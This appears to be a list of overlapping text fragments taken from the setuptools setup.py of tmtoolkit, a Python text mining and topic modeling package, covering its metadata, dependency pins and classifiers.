"'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = []",
"'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 - Beta',",
"and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues',",
"# Get the long description from the README file with open(os.path.join(here, 'README.rst'), encoding='utf-8')",
"based setup module \"\"\" import os from codecs import open from setuptools import",
"url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__,",
"Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Topic :: Scientific/Engineering ::",
"'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent',",
"'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: Software Development :: Libraries ::",
"Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language ::",
"+ '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4",
"description from the README file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description =",
"{'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get the long description from the",
"License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4',",
"if k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get the",
"Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis",
":: Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System ::",
"'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds']",
"license=__license__, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'Intended",
"['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'], }",
":: Scientific/Engineering :: Information Analysis', 'Topic :: Software Development :: Libraries :: Python",
"= '0.10.0' __author__ = '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit'",
"'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Operating",
"Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language",
"Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License',",
"classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'Intended Audience",
"'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__, description='Text Mining and",
":: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming",
"\"\"\" import os from codecs import open from setuptools import setup, find_packages __title__",
"= 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0',",
"setup( name=__title__, version=__version__, description='Text Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={",
"Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic",
"GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status ::",
"module \"\"\" import os from codecs import open from setuptools import setup, find_packages",
":: 3.8', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: Software Development ::",
"\"\"\" tmtoolkit setuptools based setup module \"\"\" import os from codecs import open",
":: Libraries :: Python Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis text mining",
":: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python ::",
"DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable':",
"setup, find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ =",
"__title__ = 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache License",
"the long description from the README file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:",
"Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL +",
"3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7',",
"3.7', 'Programming Language :: Python :: 3.8', 'Topic :: Scientific/Engineering :: Information Analysis',",
"Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python",
"'tox>=3.18.0'], } DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps",
"['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test':",
"description='Text Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL",
":: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python',",
"README file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name=__title__,",
"k not in {'recommended', 'all'}: DEPS_EXTRA['all'].extend(deps) here = os.path.abspath(os.path.dirname(__file__)) # Get the long",
"os.path.abspath(os.path.dirname(__file__)) # Get the long description from the README file with open(os.path.join(here, 'README.rst'),",
"'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0',",
"import open from setuptools import setup, find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0'",
":: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], keywords='textmining",
"} DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds'] DEPS_EXTRA['all'] = [] for k, deps in",
"'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming",
"Beta', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved",
"'/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 -",
"- Beta', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI",
"= 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache License 2.0'",
"__license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2',",
"['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2',",
"with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__, description='Text",
"'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0',",
"textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests', 'examples']), include_package_data=True, python_requires='>=3.6',",
"'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = {",
"'<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6',",
"encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic",
"Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python",
"}, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience",
"Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling topic modeling evaluation', packages=find_packages(exclude=['tests',",
"f.read() setup( name=__title__, version=__version__, description='Text Mining and Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL,",
"'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'],",
"Topic Modeling Toolkit', long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source':",
"Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS",
"'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0<5.24', 'decorator>=4.4.0,<4.5'], 'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0',",
"long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>',",
"Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python",
"['nltk>=3.5.0,<3.6'], 'excel_export': ['openpyxl>=3.0.0'], 'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra':",
"file with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name=__title__, version=__version__,",
"= 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA =",
"'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'], 'lda': ['ldafork>=1.2.0,<1.3'], 'sklearn': ['scikit-learn>=0.23,<0.24'], 'gensim': ['gensim>=3.8.0,<3.9'], 'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'], 'test': ['pytest>=6.0.0,<7',",
"Software License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language",
":: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3',",
":: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python ::",
"DEPS_EXTRA['all'] = [] for k, deps in DEPS_EXTRA.items(): if k not in {'recommended',",
"Information Analysis', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic ::",
"'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'], 'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0', 'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'],",
"'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL",
"= '<NAME>' __license__ = 'Apache License 2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2',",
"find_packages __title__ = 'tmtoolkit' __version__ = '0.10.0' __author__ = '<NAME>' __license__ = 'Apache",
"'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4'] DEPS_EXTRA = { 'datatable': ['datatable>=0.10.0,<0.11'], 'nltk': ['nltk>=3.5.0,<3.6'], 'excel_export':",
"Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[ 'Development Status",
"long_description=long_description, long_description_content_type='text/x-rst', url=GITHUB_URL, project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__,",
"project_urls={ 'Bug Reports': GITHUB_URL + '/issues', 'Source': GITHUB_URL, }, author=__author__, author_email='<EMAIL>', license=__license__, classifiers=[",
"3.8', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: Software Development :: Libraries",
"Python Modules', 'Topic :: Utilities', ], keywords='textmining textanalysis text mining analysis preprocessing topicmodeling",
"2.0' GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit' DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0', 'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4']"
] |